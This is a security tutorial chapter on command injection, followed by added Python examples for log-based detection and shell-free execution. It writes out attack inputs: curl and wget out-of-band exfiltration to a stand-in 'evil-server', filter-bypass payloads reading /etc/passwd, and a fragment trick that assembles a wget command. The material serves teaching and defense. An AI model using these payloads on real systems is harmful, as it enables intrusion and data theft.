4.5. Command Injection

4.5.1. Introduction

Command injection is a vulnerability that arises when a web application concatenates user-controlled input into a system command that is then executed on the server.

This kind of vulnerability usually appears where the application calls an external program to implement a feature. Examples are web management interfaces that configure the hostname, IP address, netmask or gateway, show system information, or shut down and restart the device, and sites that offer ping, nslookup, sending e-mail, image conversion and similar functions.

4.5.2. Common dangerous functions

4.5.2.1. PHP

  • system

  • exec

  • passthru

  • shell_exec

  • popen

  • proc_open

4.5.2.2. Python

  • os.system

  • os.popen

  • subprocess.call (when called with shell=True)

  • os.spawn*

4.5.2.3. Java

  • java.lang.Runtime.getRuntime().exec(command)

4.5.3. Common injection methods

  • ; semicolon separator

  • || && & separators

  • | pipe character

  • \r\n newline, URL-encoded as %0d%0a

  • Backtick command substitution

  • $() command substitution

4.5.4. Techniques when there is no echo (blind injection)

  • bash reverse shell

  • DNS out-of-band data exfiltration

  • HTTP out-of-band
    • curl http://evil-server/$(whoami)

    • wget http://evil-server/$(whoami)

  • Time-based inference with sleep, or other Boolean conditions

4.5.5. Common bypass methods

4.5.5.1. Space Bypass

  • < redirection symbol, e.g. cat<123

  • \t / %09 (tab)

  • ${IFS} The braces mark where the variable name ends: without them, cat$IFS2 makes the shell look up a variable named IFS2. Appending another $-expansion also terminates the name; $9 is generally used because it is the ninth positional parameter of the current shell process and is always an empty string, so cat$IFS$9 is parsed as cat followed by a separator.

4.5.5.2. Blacklist Bypass

  • Variable splicing: a=l;b=s;$a$b

  • base64 encoding: echo "bHM=" | base64 -d (bHM= decodes to ls)

  • Wildcards: /?in/?s => /bin/ls

  • String concatenation with quotes: cat /etc/pass'w'd

  • Uninitialized variable (expands to an empty string): cat$x /etc/passwd

4.5.5.3. Length Limit Bypass

>wget\
>foo.\
>com
ls -t>a
sh a

The method above uses output redirection to create a file named after each fragment of the command, then uses ls -t to list those file names in time order so that the fragments reassemble into the command, which is written to a and executed with sh. Creating a file with a redirection normally requires a command before the redirection symbol; short commands such as w or [ can be used (list them with ls /usr/bin/?). Without a leading command the shell waits on standard input and needs Ctrl+D to finish, because the redirection is applied to the standard input stream. In PHP, when shell_exec runs the command there is no standard input stream, so the file is created directly.

4.5.6. Common symbols

4.5.6.1. Command Separator

  • %0a / %0d / \n / \r

  • ;

  • & / &&

4.5.6.2. Wildcards

  • * zero or more arbitrary characters

  • ? exactly one arbitrary character

  • [ ] one character from the set in brackets, e.g. [abcd]

  • [ - ] one character from a range in encoding order, e.g. [a-z]

  • [^ ] one character not in the set in brackets
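As an added example that is not part of the original notes, the following Python script turns the separator, substitution and wildcard characters listed in 4.5.3 and 4.5.6 into a detection rule run over web-server access logs. Values are URL-decoded first, so the %0a / %0d / %09 encodings from the lists are caught as well. The log lines, endpoint paths, client addresses and the evil-server name are constructed sample data, and the function names are my own.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Metacharacter classes taken from the lists in 4.5.3 and 4.5.6. They are
# matched against the URL-decoded parameter value, so %0a, %0d, %09 and %26
# are normalised before the check.
META_CLASSES = {
    "separator": re.compile(r"[;&|\r\n]"),
    "substitution": re.compile(r"`|\$\(|\$[{A-Za-z_0-9]"),
    "wildcard": re.compile(r"[*?\[\]]"),
}

# Combined-log-format request line: "METHOD target HTTP/x.y".
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample log: addresses, paths and the evil-server host are made up.
SAMPLE_LOG = """\
192.0.2.10 - - [10/Oct/2023:13:55:36 +0000] "GET /ping?host=8.8.8.8 HTTP/1.1" 200 512
192.0.2.11 - - [10/Oct/2023:13:55:40 +0000] "GET /ping?host=8.8.8.8;id HTTP/1.1" 200 731
192.0.2.12 - - [10/Oct/2023:13:56:02 +0000] "GET /ping?host=8.8.8.8%0acat%20/etc/passwd HTTP/1.1" 200 2048
192.0.2.13 - - [10/Oct/2023:13:56:15 +0000] "GET /nslookup?name=%24(whoami).evil-server HTTP/1.1" 200 98
192.0.2.14 - - [10/Oct/2023:13:57:01 +0000] "GET /ping?host=127.0.0.1%26%26ls HTTP/1.1" 200 600
192.0.2.15 - - [10/Oct/2023:13:57:30 +0000] "GET /search?q=hello+world HTTP/1.1" 200 1500
192.0.2.16 - - [10/Oct/2023:13:58:00 +0000] "GET /convert?file=report.png HTTP/1.1" 200 4096
"""


def classify_value(value):
    """Return the names of the metacharacter classes present in a decoded value."""
    return [name for name, pattern in META_CLASSES.items() if pattern.search(value)]


def iter_params(query):
    """Split a raw query string into decoded (name, value) pairs.

    A literal '&' is the query delimiter, so an injected '&&' that is meant to
    reach a parameter value has to arrive percent-encoded (%26%26); decoding
    happens after the split, which is why it is visible to the check.
    """
    for pair in query.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        yield unquote_plus(name), unquote_plus(value)


def scan_request_target(target):
    """Flag every query parameter of one request target that carries metacharacters."""
    findings = []
    for name, value in iter_params(urlsplit(target).query):
        classes = classify_value(value)
        if classes:
            findings.append({"param": name, "value": value, "classes": classes})
    return findings


def scan_access_log(text):
    """Run the check over each request line; one finding per flagged parameter."""
    findings = []
    for line in text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        client_ip = line.split(" ", 1)[0]
        for finding in scan_request_target(match.group("target")):
            findings.append({"ip": client_ip, "target": match.group("target"), **finding})
    return findings


if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding["ip"], finding["param"], repr(finding["value"]), ",".join(finding["classes"]))
```

The rule is deliberately broad: a wildcard hit on its own is low severity (file names legitimately contain ? and []), whereas a separator or substitution hit in a parameter that feeds ping, nslookup or a similar feature deserves an alert, and a value ending in a hostname the application does not own is the out-of-band pattern from 4.5.4.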

4.5.7. Defense

  • Disable the corresponding functions when they are not needed

  • Avoid executing external programs or commands wherever possible

  • Validate input against its expected format (allowlist)

  • Escape all shell metacharacters in a command
    • shell metacharacters include #&;`,|*?~<>^()[]{}$\
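To make the Defense items concrete, here is an added Python example (my own code, not the notes' own) for a hypothetical ping feature: the injectable string-splicing pattern, a blacklist filter together with the reason the bypasses in 4.5.5 defeat it, allowlist validation, execution through an argument vector with no shell, and escaping with the metacharacter list above beside shlex.quote. The endpoint, the function names and the hostname expression are assumptions.

```python
import re
import shlex
import subprocess

# The shell metacharacter list from the Defense section.
SHELL_METACHARACTERS = set("#&;`,|*?~<>^()[]{}$\\")

# Allowlist for the hypothetical "ping a host" feature: an IPv4 address or a
# DNS name made of letters, digits and hyphens. A label may not start with a
# hyphen, so the value can never be parsed as a ping option either.
HOST_RE = re.compile(
    r"^(?=.{1,253}$)"
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def vulnerable_command(host):
    """The injectable pattern: untrusted input spliced into a command string.
    Handing the result to os.system / shell_exec lets any separator or $( )
    inside `host` run a second command. Only built here, never executed."""
    return "ping -c 1 " + host


def blacklist_filter(host):
    """A typical first fix: refuse a few separators, the backtick and the space.
    The bypasses in 4.5.5 get through: $( ) needs no separator at all and
    ${IFS} stands in for the blocked space."""
    for ch in ";&|` \n":
        if ch in host:
            raise ValueError("forbidden character %r" % ch)
    return host


def validate_host(host):
    """Allowlist validation (the 'input format check' defence)."""
    if not HOST_RE.match(host):
        raise ValueError("not a hostname or IPv4 address: %r" % host)
    return host


def ping_argv(host):
    """Argument vector for a shell-free call: each element is exactly one
    argv entry, so no shell ever parses the user's value."""
    return ["ping", "-c", "1", validate_host(host)]


def run_ping(host):
    """Execute without a shell (shell=False is the subprocess default)."""
    return subprocess.run(ping_argv(host), capture_output=True, text=True, timeout=10)


def escape_metacharacters(value):
    """Backslash-escape the page's metacharacter set. A last resort for the
    rare case where a shell string cannot be avoided; the list contains no
    quotes, newline or space, which is why shlex.quote is preferable."""
    return "".join("\\" + c if c in SHELL_METACHARACTERS else c for c in value)


def quote_for_shell(value):
    """Standard-library quoting: single-quotes anything outside a safe set."""
    return shlex.quote(value)


if __name__ == "__main__":
    probe = "$(cat${IFS}/etc/passwd)"   # bypass payload from 4.5.5, as constructed input
    print("spliced:", vulnerable_command(probe))
    print("blacklist let through:", blacklist_filter(probe))
    print("escaped:", escape_metacharacters(probe))
    print("quoted:", quote_for_shell(probe))
    print("argv:", ping_argv("example.com"))
    try:
        validate_host(probe)
    except ValueError as err:
        print("allowlist rejected:", err)
```

The order of preference is the one the list gives: not calling a program at all, then an argument vector with strict allowlist validation (run_ping), and only then escaping. The blacklist is kept in the example purely to show that a filter built from the characters one happens to think of is what the bypass section is written against.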